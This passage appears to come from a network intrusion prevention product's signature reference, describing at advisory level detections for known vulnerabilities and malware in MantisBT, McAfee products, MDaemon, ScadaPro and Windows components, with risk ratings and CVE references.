Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mantis Bug Tracker
Type: Input Validation
Description: Insuffcient request validation results in a cross-site scripting vulnerability in Mantis Bug Tracker. A successful exploitation allows arbitary code to be run in the browser of an user.
Situation: HTTP_CRL-Mantis-Bug-Tracker-Filter-API-View_Type-Cross-Site-Scripting
References:
CVE-2016-6837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6837
Back to top

Mantis-Bug-Tracker-Verify.PHP-Confirm_Hash-Remote-Password-Reset

About this vulnerability: A vulnerability in Mantis MantisBT
Risk: Moderate
First detected in: sgpkg-ips-912-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MantisBT
Type: Input Validation
Description: Improper input validation on the confirm_hash parameter of a password reset request causes a password reset vulnerability in MantisBT. A successful exploit allows an attacker to make arbitrary changes to account passwords.
Situation: HTTP_CS-Mantis-Bug-Tracker-Verify.PHP-Confirm_Hash-Remote-Password-Reset
References:
CVE-2017-7615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7615
Back to top

Mantis-MantisBT-Bug-Tracker-Config_Report-Move_Attachments_Page-XSS

About this vulnerability: A vulnerability in Mantis MantisBT
Risk: Moderate
First detected in: sgpkg-ips-872-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MantisBT
Type: Input Validation
Description: Improper handling of request values causes a cross-site scripting vulnerability in MantisBT. A successful exploitation allows an attacker to run arbitrary scripts in the client browser.
Situation: HTTP_CRL-Mantis-MantisBT-Bug-Tracker_Config_Report-Move_Attachments_Page-XSS
References:
CVE-2017-7309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7309
Back to top

MantisBT-Admin-SQL-Injection

About this vulnerability: A MantisBT Admin SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MantisBT
Type: SQL Injection
Description: A vulnerability in the MantisBT, versions 1.2.13 through 1.2.16, in the manage configuration page adm_config_report.php, which allow remote attackers to execute arbitrary SQL commands via the filter_config_id parameter.
Situation: HTTP_CRL_MantisBT-Admin-SQL-Injection
References:
CVE-2014-2238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2238
BID-65903
http://www.securityfocus.com/bid/65903
Back to top

MantisBT-XmlImportExport-PHP-Code-Injection

About this vulnerability: A MantisBT XmlImportExport PHP Code Injection vulnerability
Risk: High
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MantisBT
Type: Misconfiguration
Description: A vulnerability in MantisBT, versions 1.2.0a3 to 1.2.17, in the XmlImportExport plugin, which allows remote attachers to execute arbitrary PHP code via the description and issuelink field.
Situation: HTTP_CS-MantisBT-XmlImportExport-PHP-Code-Injection
References:
CVE-2014-7146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7146
Back to top

Manutharcs-Botnet

About this vulnerability: Manutharcs botnet
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Code Injection
Description: Manutharcs is a worm that infects Linux-based systems.
Situation: Generic_CS-Manutharcs-Linux-Infection-Traffic
Back to top

Mapurltozone-Security-Feature-Bypass-CVE-2025-21247

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1847-5242
Last changed: sgpkg-ips-1847-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows MapUrlToZone security feature bypass vulnerability CVE-2025-21247.
Situation: File-Text_Mapurltozone-Security-Feature-Bypass-CVE-2025-21247
File-Binary_Mapurltozone-Security-Feature-Bypass-CVE-2025-21247
References:
CVE-2025-21247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21247
ms25-mar
http://technet.microsoft.com/security/bulletin/ms25-mar
Back to top

MaraCMS-Arbitrary-PHP-File-Upload

About this vulnerability: A vulnerability in MaraCMS
Risk: High
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: MaraCMS
Type: Insecure Configuration
Description: There exists a vulnerability in MaraCMS, version 7.5, which allows remote attackers to execute arbitrary PHP code by uploading a malicious PHP file to the web root via an HTTP POST request to codebase/handler.php.
Situation: HTTP_CS-MaraCMS-Arbitrary-PHP-File-Upload
References:
CVE-2020-25042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25042
Back to top

Marketscore-OSSProxy-Internet-Accelerator-User-Agent

About this vulnerability: Marketscore OSSProxy Internet Accelerator User Agent
Risk: Low
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: User-Agent from Marketscore (Netsetter) OSSProxy Internet Accelerator was detected. When installed, OSSProxy routes all Internet traffic through an unknown proxy. Using an unknown 3rd party proxy may lead to information disclosure.
Situation: HTTP_CSH-Marketscore-OSSProxy-Internet-Accelerator-User-Agent
Back to top

Maze-Ransomware-Traffic

About this vulnerability: Maze ransomware traffic was detected
Risk: High
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Maze ransomware is able to encrypt all files in the infected system and network shares.
Situation: HTTP_CS-Maze-Ransomware-Traffic
Back to top

McAfee-Asset-Manager-Downloadreport-Information-Disclosure

About this vulnerability: A vulnerability in McAfee Asset Manager
Risk: Moderate
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee Asset Manager
Type: Directory Traversal
Description: An information disclosure vulnerability has been reported in McAfee Asset Manager. The vulnerability is due to insufficient input validation on the "reportFileName" parameter of "downloadReport". A remote authenticated attacker can exploit this vulnerability to download arbitrary files from the server.
Situation: HTTP_CRL-McAfee-Asset-Manager-Downloadreport-Information-Disclosure
References:
CVE-2014-2588
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2588
BID-66302
http://www.securityfocus.com/bid/66302
OSVDB-104633
http://www.osvdb.org/104633
Back to top

McAfee-Asset-Manager-Reportsaudit.jsp-Input-Validation-Error

About this vulnerability: A vulnerability in McAfee Asset Manager
Risk: Moderate
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee Asset Manager
Type: Input Validation
Description: An input validation error vulnerability has been reported in McAfee Asset Manager. The vulnerability is due to insufficient input validation on the "user" parameter of "ReportsAudit.jsp". A remote authenticated attacker can exploit this vulnerability to execute SQL commands on the underlying database.
Situation: HTTP_CSU-McAfee-Asset-Manager-Reportsaudit.jsp-Input-Validation-Error
References:
CVE-2014-2587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2587
BID-66302
http://www.securityfocus.com/bid/66302
OSVDB-104634
http://www.osvdb.org/104634
Back to top

McAfee-Cloud-Single-Sign-On-Extensionaccessservlet-Directory-Traversal

About this vulnerability: A vulnerability in McAfee Cloud Identity Manager
Risk: High
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: McAfee Cloud Identity Manager; McAfee Cloud Single Sign On; McAfee Intel Expressway Cloud Access 360-SSO
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in the ExtensionAccessServlet included in McAfee Cloud Single Sign On (formerly McAfee Cloud Identity Manager). A remote unauthenticated attacker can exploit this vulnerability to download arbitrary files from the server, including a file containing a hash of the product's administrator password.
Situation: HTTP_CSU-McAfee-Cloud-Single-Sign-On-Extensionaccessservlet-Directory-Traversal
References:
CVE-2014-2536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2536
BID-66181
http://www.securityfocus.com/bid/66181
OSVDB-104113
http://www.osvdb.org/104113
Back to top

McAfee-e-Business-Server-Authentication-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in McAfee E-Business server
Risk: Moderate
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee e-Business Server
Type: Buffer Overflow
Description: McAfee E-Business Servers administration interface suffers from a buffer overflow vulnerability. Remote attackers can exploit the vulnerability by sending a long authentication packet that overflows a buffer and allows arbitrary code execution.
Situation: McAfee_CS-McAfee-e-Business-Server-Authentication-Buffer-Overflow
References:
CVE-2008-0127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0127
BID-27197
http://www.securityfocus.com/bid/27197
Back to top

McAfee-e-Business-Server-Authentication-Remote-Code-Execution

About this vulnerability: Remote code execution prior authentication vulnerability
Risk: High
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee e-Business Server
Type: Malfunction
Description: McAfee E-Business Server is prone to a remote code-execution vulnerability that occurs prior to authentication. Successful exploits leads to remote compromise, failed exploits may lead to denial-of-service condition.
Situation: McAfee_CS-McAfee-e-Business-Server-Authentication-Bypass
References:
CVE-2008-0127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0127
BID-27197
http://www.securityfocus.com/bid/27197
Back to top

McAfee-Epolicy-Orchestrator-Agent-Stack-Overflow

About this vulnerability: McAfee ePolicy Orchestrator Agent Stack Overflow
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: McAfee ePolicy Orchestrator
Type: Malfunction
Description: There is a vulnerability in McAfee ePolicy Orchestrator.
Situation: HTTP_CS-McAfee-Epolicy-Orchestrator-Agent-Stack-Overflow
Back to top

McAfee-Epolicy-Orchestrator-Datachannel-Guid-SQL-Injection

About this vulnerability: A vulnerability in McAfee ePolicy Orchestrator
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee ePolicy Orchestrator
Type: Input Validation
Description: There exists an SQL injection vulnerability in McAfee ePolicy Orchestrator. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_McAfee-Epolicy-Orchestrator-Datachannel-Guid-SQL-Injection
References:
CVE-2016-8027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8027
Back to top

McAfee-Epolicy-Orchestrator-Framework-Services-Format-String

About this vulnerability: A format string vulnerability in McAfee Framework Services
Risk: High
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee Agent; McAfee Common Management Agent; McAfee ePolicy Orchestrator
Type: Format String
Description: There is a format string vulnerability in McAfee Framework Services. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious UDP packet with specially crafted Sender, Package, or Computer fields to terminate the affected service or to execute arbitrary code with the privileges of the affected service, normally System.
Situation: Generic_UDP-McAfee-Epolicy-Orchestrator-Framework-Services-Format-String
References:
CVE-2008-1357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1357
BID-28228
http://www.securityfocus.com/bid/28228
OSVDB-42853
http://www.osvdb.org/42853
Back to top

McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in McAfee Framework Services used in McAfee ePolicy Orchestrator and other products
Risk: High
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee ePolicy Orchestrator
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in McAfee Framework Services used in McAfee ePolicy Orchestrator and other products. A remote attacker can send an HTTP request containing an overly long HTTP request line to the target host to exploit this vulnerability. A successful attack leads to a denial of service or arbitrary code execution with the privileges of the affected service, which is normally System.
Situation: HTTP_CS-McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow
Generic_CS-McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow
References:
CVE-2008-1855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1855
BID-28573
http://www.securityfocus.com/bid/28573
OSVDB-44161
http://www.osvdb.org/44161
Back to top

McAfee-Epolicy-Orchestrator-Multiple-Cross-Site-Scripting

About this vulnerability: A vulnerability in McAfee ePolicy Orchestrator
Risk: Moderate
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee ePolicy Orchestrator
Type: Input Validation
Description: Multiple cross site scripting vulnerabilities exist in McAfee ePolicy Orchestrator. The vulnerabilities are due to insufficient input validation of various parameters submitted to pages of the affected device. This can result in reflected cross site scripting. A remote attacker could exploit these vulnerabilities by enticing an authenticated user to follow a specially crafted link. Successful exploitation could result in script code being executed in the browser of the enticed user.
Situation: HTTP_CRL-McAfee-Epolicy-Orchestrator-Multiple-Cross-Site-Scripting
References:
CVE-2013-4883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4883
OSVDB-95191
http://www.osvdb.org/95191
OSVDB-95190
http://www.osvdb.org/95190
OSVDB-95189
http://www.osvdb.org/95189
OSVDB-95188
http://www.osvdb.org/95188
OSVDB-95187
http://www.osvdb.org/95187
Back to top

McAfee-Epolicy-Orchestrator-Uid-Multiple-SQL-Injection

About this vulnerability: A vulnerability in McAfee ePolicy Orchestrator
Risk: Moderate
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee ePolicy Orchestrator
Type: SQL Injection
Description: There are multiple SQL injection vulnerabilities in McAfee ePolicy Orchestrator. The vulnerabilities are due to insufficient input validation on the UID parameter of two URLs. A remote, authenticated attacker can exploit these vulnerabilities by sending specially crafted requests to the affected server. Successful exploitation could result in injected SQL code being executed on the database.
Situation: HTTP_CRL-McAfee-Epolicy-Orchestrator-Uid-Multiple-SQL-Injection
References:
CVE-2013-4882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4882
BID-61421
http://www.securityfocus.com/bid/61421
OSVDB-95192
http://www.osvdb.org/95192
Back to top

McAfee-Epolicy-Orchestrator-XML-Entity-Injection

About this vulnerability: A vulnerability in McAfee ePolicy Orchestrator
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee ePolicy Orchestrator
Type: Input Validation
Description: An XML External Entity vulnerability has been reported in McAfee ePolicy Orchestrator (ePO). The vulnerability is due to an input validation error in the ePO-web application. A remote attacker can exploit this vulnerability by sending a maliciously crafted XML dashboard definition. This can result in the disclosure of sensitive information.
Situation: HTTP_CRL-McAfee-Epolicy-Orchestrator-XML-Entity-Injection
References:
CVE-2015-0921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0921
BID-71881
http://www.securityfocus.com/bid/71881
OSVDB-116855
http://www.osvdb.org/116855
Back to top

McAfee-Epolicy-Orchestrator-Xml-External-Entity

About this vulnerability: A vulnerability in McAfee ePolicy Orchestrator
Risk: High
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee ePolicy Orchestrator
Type: Input Validation
Description: An XML External Entity (XXE) vulnerability has been reported in McAfee ePolicy Orchestrator (ePO). The vulnerability is due to a design weakness in the ePO Web Console component. A remote attacker can exploit this vulnerability by sending a maliciously crafted XML dashboard definition. This can result in the disclosure of sensitive information.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2014-2205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2205
BID-65771
http://www.securityfocus.com/bid/65771
OSVDB-103717
http://www.osvdb.org/103717
Back to top

McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in McAfee Firewall Reporter
Risk: High
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1588-5242
Platform: Windows
Software: McAfee Firewall Reporter
Type: Input Validation
Description: An authentication bypass vulnerability exists in McAfee Firewall. The vulnerability is due to a sanitization error in GeneralUtilities.pm while authenticating users. The vulnerable code does not properly validate session identifier values in HTTP requests. A remote unauthenticated attacker can leverage this vulnerability to gain access to restricted information or execute arbitrary code on a target system.
Situation: HTTP_CSH-McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution
HTTP_CRL-McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution
References:
BID-47306
http://www.securityfocus.com/bid/47306
OSVDB-71842
http://www.osvdb.org/71842
Back to top

McAfee-FreeScan-Information-Disclosure

About this vulnerability: A vulnerability in McAfee FreeScan
Risk: High
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: McAfee FreeScan
Type: Buffer Overflow
Description: There is a vulnerability in a component of the McAfee's FreeScan service. An information disclosure vulnerability may allow remote attackers to gain file-system information, and can be used to obtain the username being used.
Situation: File-Text_McAfee-FreeScan-Information-Disclosure
Back to top

McAfee-Multiple-Products-Lha-Type-2-File-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in McAfee Active Mail Protection
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee VirusScan Enterprise
Type: Input Validation
Description: There is a vulnerability in the way McAfee Antivirus Library parses LHA Type-2 archive files. The vulnerable archive parser does not perform sufficient bounds checking on the file name field and the directory name field in the header of LHA archive files before copying the field into a buffer, resulting in a buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code in the SYSTEM context on the target system by sending a specially crafted LHA file to the target. Upon receiving a simple attack, the thread of the vulnerable product will crash when it try to scan the malicious LHA archive for known trojans or viruses, therefore an malicious LHA archive may be downloaded and stored on the local file system without the affected product raising a warning or otherwise informing the user of a potential threat. The product in such a case exhibits ineffective and misleading behaviour. In an attack that allows code execution, the target system's behaviour is entirely dependent on the intended purpose of the injected code. The code will execute with system privileges.
Situation: File-Binary_McAfee-Multiple-Products-Lha-Type-2-File-Handling-Buffer-Overflow
References:
CVE-2005-0644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0644
BID-12832
http://www.securityfocus.com/bid/12832
Back to top

McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in McAfee NeoTrace
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee NeoTrace
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the NeoTrace ActiveX control. The vulnerability is due to a lack of input validation while processing user-supplied parameters for the ActiveX control.
Situation: HTTP_SS-McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow
File-Text_McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow
References:
CVE-2006-6707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6707
BID-21697
http://www.securityfocus.com/bid/21697
Back to top

McAfee-Security-Center-Mcinsctl.dll-ActiveX-Control-File-Overwrite

About this vulnerability: A vulnerability in McAfee Personal Firewall Plus
Risk: High
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee Security Center
Type: Malfunction
Description: A vulnerability exists in the McAfee Security Center product. The flaw is caused by a lack of implementation of domain-based access restrictions on the McLog ActiveX control provided by the affected product. A remote attacker may exploit this vulnerability via a specially crafted Web page to write arbitrary files on the target system. After successfully exploiting this vulnerability, a file on the target file system might be created, modified, or overwritten. An attacker may write a file to a startup folder in order to execute arbitrary code during the next reboot or logon session or overwrite credential files on the system in order to gain access to the system. Thus, the behaviour of the target depends on the intention of the attacker.
Situation: File-Text_McAfee-Security-Center-Mcinsctl.dll-ActiveX-Control-File-Overwrite
References:
CVE-2005-3657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3657
BID-15986
http://www.securityfocus.com/bid/15986
Back to top

McAfee-Virtual-Technician-ActiveX-Control-Insecure-Method-Exposure

About this vulnerability: A vulnerability in McAfee Virtual Technician
Risk: High
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee Virtual Technician; McAfee ePolicy Orchestrator
Type: Malfunction
Description: An insecure method exposure vulnerability has been reported in McAfee Virtual Technician. The vulnerability is due to exposing the Save() method in an ActiveX control defined in the McHealthCheck.dll, which allows creating and overwriting arbitrary files on the vulnerable system with an XML file. Remote attackers can exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation could result in corruption of files which might lead to a denial-of-service condition.
Situation: File-Text_McAfee-Virtual-Technician-ActiveX-Control-Insecure-Method-Exposure
References:
CVE-2012-5879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5879
BID-58750
http://www.securityfocus.com/bid/58750
OSVDB-91700
http://www.osvdb.org/91700
Back to top

McAfee-Virtual-Technician-Mvt.mvtcontrol-ActiveX-Insecure-Method

About this vulnerability: A vulnerability in McAfee Virtual Technician
Risk: Moderate
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee Virtual Technician
Type: Malfunction
Description: An insecure method has been discovered in McAfee Virtual Technician. The vulnerability is due to a design weakness in the GetObject() method, which allows instantiation of an arbitrary object on the vulnerable system. Remote attackers can exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation would result in execution of arbitrary code in the context of the currently logged-on user.
Situation: File-Text_McAfee-Virtual-Technician-Mvt.mvtcontrol-ActiveX-Insecure-Method
References:
BID-53304
http://www.securityfocus.com/bid/53304
Back to top

McAfee-Virtual-Technician-Remote-Code-Execution

About this vulnerability: A McAfee Virtual Technician Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee Virtual Technician
Type: Input Validation
Description: A vulnerability in McAfee Virtual Technician, versions before 6.4, which allows remote attackers to execute arbitrary code or cause a denial of service condition by loading additional unsafe classes such as WScript.Shell
Situation: File-Text_JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
References:
CVE-2012-4598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4598
OSVDB-81657
http://www.osvdb.org/81657
Back to top

McAfee-VirusScan-On-Access-Scanner-Long-Unicode-Filename-Handling

About this vulnerability: Buffer overflow vulnerability in McAfee VirusScan Enterprise
Risk: High
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee VirusScan Enterprise
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in McAfee VirusScan. The flaw is due to a boundary error when processing overly long file names that contain Unicode characters. A remote attacker can exploit this vulnerability by placing a file with a specially crafted name on the target system and enticing the user to access the file. Successful exploitation may allow arbitrary code execution in the security context of System.
Situation: File-Binary_McAfee-VirusScan-On-Access-Scanner-Long-Unicode-Filename-Handling
References:
CVE-2007-2152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2152
BID-23543
http://www.securityfocus.com/bid/23543
Back to top

McAfee-Web-Reporter-Jboss-Ejbinvokerservlet-Marshalled-Object-Code-Execution

About this vulnerability: A vulnerability in McAfee Web Reporter
Risk: Moderate
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: McAfee Web Reporter
Type: Malfunction
Description: There is a code execution vulnerability in McAfee Web Reporter due to embedding a vulnerable version of JBoss. The vulnerability is due to a misconfiguration error when handling certain HTTP requests containing marshalled Java objects. A remote unauthenticated attacker could exploit this vulnerability to execute arbitrary code on McAfee Web Reporter with a vulnerable version of JBoss. Successful exploitation could result in arbitrary code being executed in the context of the vulnerable application which is System on Windows platforms.
Situation: HTTP_CS-McAfee-Web-Reporter-Jboss-Ejbinvokerservlet-Marshalled-Object-Code-Execution
Back to top

Mcrat-Botnet

About this vulnerability: McRat Botnet
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: McRat is a malicious Remote Access Tool. It may steal data and passwords from the infected machine and try to install additional malware.
Situation: Generic_SS-Mcrat-Botnet-Activity
Back to top

MDaemon-IMAP-Command-Buffer-Overflow

About this vulnerability: A vulnerability in MDaemon
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MDaemon
Type: Buffer Overflow
Description: A vulnerability exists in the way the MDaemon mail server processes certain IMAP commands. Multiple overflows occur when an overly long argument is passed to the LIST command of IMAP protocol. Exploitation of this vulnerability may lead to a denial of service condition or possibly the execution of arbitrary code with system privileges.
Situation: IMAP_MDaemon-IMAP-Command-Buffer-Overflow
References:
CVE-2004-1546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1546
BID-11238
http://www.securityfocus.com/bid/11238
Back to top

MDaemon-IMAP-Status-Command-BOF

About this vulnerability: Buffer overflow in MDaemon IMAP Server
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MDaemon
Type: Buffer Overflow
Description: MDaemon mail server is vulnerable to a stack-based buffer overflow. An authenticated remote attacker could send a long string to the STATUS command of the IMAP component, to overflow the buffer and possibly execute arbitrary code on the server.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command
References:
CVE-2004-2292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2292
BID-10366
http://www.securityfocus.com/bid/10366
Back to top

MDaemon-Raw-Message-Handler-Buffer-Overflow

About this vulnerability: A vulnerability in Alt-N Technologies MDaemon
Risk: High
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1730-5242
Platform: Windows
Software: MDaemon
Type: Buffer Overflow
Description: MDaemon/WorldClient mail server may be prone to a buffer overflow vulnerability when handling messages with a long 'From' field. This issue may allow a remote attacker to execute arbitrary code in the context of the vulnerable software. The behaviour of the attack target depends on the data used to overrun the buffer. A normal attack without a code exploit will only cause a denial of service. However, if a skillful attacker includes a code exploit embedded in the attack request and the code is successfully executed, then the behaviour of target will be variable according to the function of the code.
Situation: HTTP_CRL-MDaemon-HTTP-Raw-Message-Handler-Buffer-Overflow
References:
CVE-2003-1200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1200
BID-9317
http://www.securityfocus.com/bid/9317
OSVDB-3255
http://www.osvdb.org/3255
Back to top

MDaemon-SMTP-Command-Buffer-Overflow

About this vulnerability: A vulnerability in MDaemon
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MDaemon
Type: Buffer Overflow
Description: A vulnerability exists in the way the MDaemon mail server processes certain SMTP commands. A stack buffer overflow occurs when an overly long argument is passed to the SAML, SOML, SEND commands of the SMTP protocol. Exploitation of this vulnerability may lead to a denial of service condition or possibly the execution of arbitrary code with system privileges.
Situation: SMTP_MDaemon-SMTP-Command-Buffer-Overflow
References:
CVE-2004-1546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1546
BID-11238
http://www.securityfocus.com/bid/11238
OSVDB-10224
http://www.osvdb.org/10224
OSVDB-10223
http://www.osvdb.org/10223
Back to top

Measuresoft-ScadaPro-Directory-Traversal

About this vulnerability: A vulnerability in Measuresoft ScadaPro
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Measuresoft ScadaPro
Type: Directory Traversal
Description: A vulnerability in Measuresoft ScadaPro allows an external attacker to execute arbitrary commands in the target system.
Situation: Generic_CS-Measuresoft-ScadaPro-Directory-Traversal
Generic_UDP-Measuresoft-ScadaPro-Directory-Traversal
Back to top

Measuresoft-ScadaPro-Remote-Code-Execution

About this vulnerability: A vulnerability in Measuresoft ScadaPro
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Measuresoft ScadaPro
Type: Insecure Configuration
Description: A vulnerability in Measuresoft ScadaPro allows an external attacker to execute arbitrary commands in the target system.
Situation: Generic_CS-Measuresoft-ScadaPro-Remote-Code-Execution
Generic_UDP-Measuresoft-ScadaPro-Remote-Code-Execution
References:
CVE-2011-3497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3497
BID-49613
http://www.securityfocus.com/bid/49613
OSVDB-75490
http://www.osvdb.org/75490
Back to top

Measuresoft-ScadaPro-XF-Command-Execution

About this vulnerability: An attempt to exploit vulnerability in Measuresoft ScadaPro
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Measuresoft ScadaPro
Type: Input Validation
Description: Lack of proper input sanitation allows an attacker to run system commands
Situation: Generic_CS-Measuresoft-ScadaPro-XF-Command-Execution
References:
CVE-2011-3490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3490
OSVDB-75490
http://www.osvdb.org/75490
Back to top

Media-Foundation-Memory-Corruption-CVE-2018-8251

About this vulnerability: A vulnerability in Windows Media Foundation
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Windows Media Foundation. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Media-Foundation-Memory-Corruption-CVE-2018-8251
References:
CVE-2018-8251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8251
ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun
Back to top

Media-Player-Network-Sharing-Service-Code-Execution-CVE-2010-3225

About this vulnerability: A code execution vulnerability in Microsoft Windows Media Player
Risk: Critical
